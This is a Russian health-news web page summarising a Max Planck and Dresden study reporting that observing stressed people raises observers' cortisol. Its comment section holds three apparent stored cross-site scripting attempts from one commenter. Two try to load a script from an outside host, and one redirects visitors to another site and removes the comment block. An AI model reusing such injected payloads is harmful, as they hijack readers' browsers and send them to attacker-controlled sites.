Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Можно ли заразиться стрес...  >>  Можно ли заразиться стрессом? Ученые говорят – ДА! Как тут не психовать?
 
Обратная связь
 

Можно ли заразиться стрессом? Ученые говорят – ДА! Как тут не психовать?

Размер шрифта
15 января 2015 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Оказывается, можно подхватить не только простуду, но и стресс! Именно к такому неожиданному выводу недавно пришли ученые.

Можно ли заразиться стрессом? Ученые говорят – ДА! Как тут не психовать?

Эта новость действительно несколько выбивает из колеи, но стресс заразен – об этом с уверенностью заявляют ученые из Института наук о мозге общества Макса Планка и Технологического университета Дрездена. Их исследование показало, что, если мы находимся рядом с человеком, переживающим стресс, наше тело тоже начинает вырабатывать гормон стресса – кортизол.

Участники эксперимента должны были решать сложные арифметические задачи и отвечать на вопросы, в то время как остальные участники наблюдали за ними и оценивали их действия. Только 5% людей, выполнявших задания, оставались спокойными – однако даже в этом случае наблюдавшие за ними участники испытывали волнение. Если участник и наблюдатель были знакомы, то в 40% случаев наблюдатель испытывал стресс во время эксперимента. Этот показатель был на 10% ниже, если участники не были знакомы друг с другом.

Ученые обнаруживали стрессовую реакцию у наблюдателей даже тогда, когда они следили за теми, кто выполнял задания, из другой комнаты или же видели их на экране компьютера. «Это означает, что телевизионные программы, демонстрирующие страдания людей, могут вызывать стресс у зрителей», – рассказывает Вероника Энгерт, автор работы. «Стресс оказался очень заразен».

Ученые однако отметили, что одиночная стрессовая реакция никак не вредит организму, опасен только хронический стресс. «Гормональный ответ на стресс сформировался в результате эволюции. Когда вы находитесь в опасной ситуации, ваш организм начинает вырабатывать большое количество гормона стресса – кортизола», – объясняет Энгерт. «Но если уровень кортизола повышен постоянно – это уже не очень хорошо для нашего организма».

Так что не стоит все время находиться в обществе людей, подверженных стрессу – будь то ваши коллеги по работе или же друзья. Найдите время и на общение с позитивно настроенными людьми, и вы будете чувствовать себя гораздо лучше.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - his shadow

15 января 2015 в 10:10

Комментарий удален за нарушение Правил общения

2 - his shadow

18 января 2015 в 13:27

Цитировать   |   Пожаловаться

О..опять, модеры, да что вы мои посты трёте.
Я ведь единственныя, кто эту муру наукообразную читает ))))))

3 - his shadow

31 января 2015 в 11:23

Комментарий удален за нарушение Правил общения

4 - Гость

02 марта 2015 в 23:55

Цитировать   |   Пожаловаться

)))

5 - zzzzzz

30 июня 2015 в 18:27

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

6 - zzzzzz

30 июня 2015 в 21:24

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

7 - zzzzzz

30 июня 2015 в 22:21

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Что с вами делает злость?   «Им овладело беспокойство…»   Болезни-близнецы. Депрессия и гипотиреоз   Как мы реагируем на стресс  
23 октября 2012Мама может спасти своего ребенка от стресса 01 февраля 2013Диагноз «шизофрения» можно поставить по движению глаз
 
31 января 2013От чего зависит время и можно ли им управлять 17 октября 2012Гормон оргазма поможет прочесть мысли
 

Слайдшоу

1
Супереда против стресса
Вся правда о депрессии
Что съесть, чтобы не психовать

Тесты

Вредит ли здоровью ваш мобильный?
Есть ли у вас анемия?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.